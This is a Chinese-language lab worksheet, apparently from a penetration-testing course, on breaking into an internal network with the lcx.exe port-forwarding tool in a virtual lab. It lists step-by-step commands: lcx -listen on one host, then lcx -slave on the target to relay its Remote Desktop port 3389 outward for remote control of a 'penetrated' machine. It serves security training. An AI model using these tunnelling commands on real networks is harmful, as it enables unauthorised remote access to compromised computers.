教学研究
| 课程编写 | |||
| 类别 | 内容 | ||
| 实验课题名称 | Web渗透-隐藏信息-03端口转发实现内网突破 | ||
| 实验目的与要求 |
1、了解Web渗透端口转发实现内网突破 2、熟练掌握端口转发实现内网突破 |
||
| 实验环境 | VPC1(虚拟PC) | 操作系统类型:windows,网络接口:本地连接 | |
| VPC1 连接要求 | PC 网络接口,本地连接与实验网络直连 | ||
| 软件描述 |
1、学生机要求安装java环境 2、vpc安装windows |
||
| 实验环境描述 |
1、 学生机与实验室网络直连; 2、 VPC1与实验室网络直连; 3、 学生机与VPC1物理链路连通; |
||
| 预备知识 |
在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因很难实现它。 例如,局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。 因此要想让外网用户能够访问局域网中的系统服务,必须进行端口映射等操作才行。 端口映射在渗透内网的时候经常用到,特别是要登录远程终端服务时,使用端口映射就非常方便。 Lcx.exe是一个端口转发工具,相当于把渗透主机A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于连接A机的3389端口。 Lcx程序多用于被控制计算机处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便。 因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等程序进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。 |
||
| 实验内容 |
1、了解Web渗透端口转发实现内网突破 2、熟练掌握端口转发实现内网突破 |
||
| 实验步骤 |
l 学生登录实验场景的操作 1、 学生单击 “网络拓扑”进入实验场景,单击windows2003中的“打开控制台”按钮,进入目标主机。 2、学生输入账号administrator ,密码123456,登录到实验场景中的目标主机。 3、进入d:\tools,解压缩lxc.rar,,选择”解压到lxc\” 4、进入d:\tools\lcx\lcx中,您会发现lcx.exe端口转发工具 5、单击开始 – 运行 – 输入命令cmd,按下enter键 6、Ipconfig/all查看本地地址 (地址是自动分配的可能与该计算机的ip不一样,下面的实验要看清自己的ip) 7、start打开新的DOS窗口 8、进入d: 9、使用命令 : cd “d:\tools\lcx\lcx\” 进入lcx工具目录下 10、执行lcx.exe 看一下帮助 11、使用命令:lcx.exe –listen 2222 1111 在外网服务器上开启2222 1111监听端口 12、在服务器上开启了两个监听端口:2222、1111,同时等待客户机连接,本地端口2222端口 13、切换到底层的dos窗口,查看监听端口使用命令netstat –an, 14、单击 “网络拓扑”进入实验场景,单击windowsxp中的“打开控制台”按钮,进入目标主机。 15、输入用户名administration密码123456 16、开始-运行-cmd回车 17、进入dos窗口 18、查看本地ip地址(ipconfig) 19、同步骤3一样,进入d:\tools,解压缩lxc.rar,选择”解压到lxc\” 然后,进入目录 D:\tools\lcx\lcx, 20、运行lcx 命令 21、查看本地端口,是否开启远程服务; 22、使用lcx –slave 192.168.1.133 2222 127.0.0.1 3389(192.168.1.133为windows2003的ip地址,此地址不固定) 23、开始-运行-cmd回车,打开一个新的dos界面 24、查看会话:netstat –an 25、切换到windows2003控制台,查看服务状况,被渗透的机器已经连接上。 26、使用远程桌面连接,进行控制连接被渗透的机器。 开始->所有程序->附件->通讯->远程桌面连接 27、输入127.0.0.1:1111,点击连接 28、实验完毕,关闭所有窗口和虚拟机。 |
||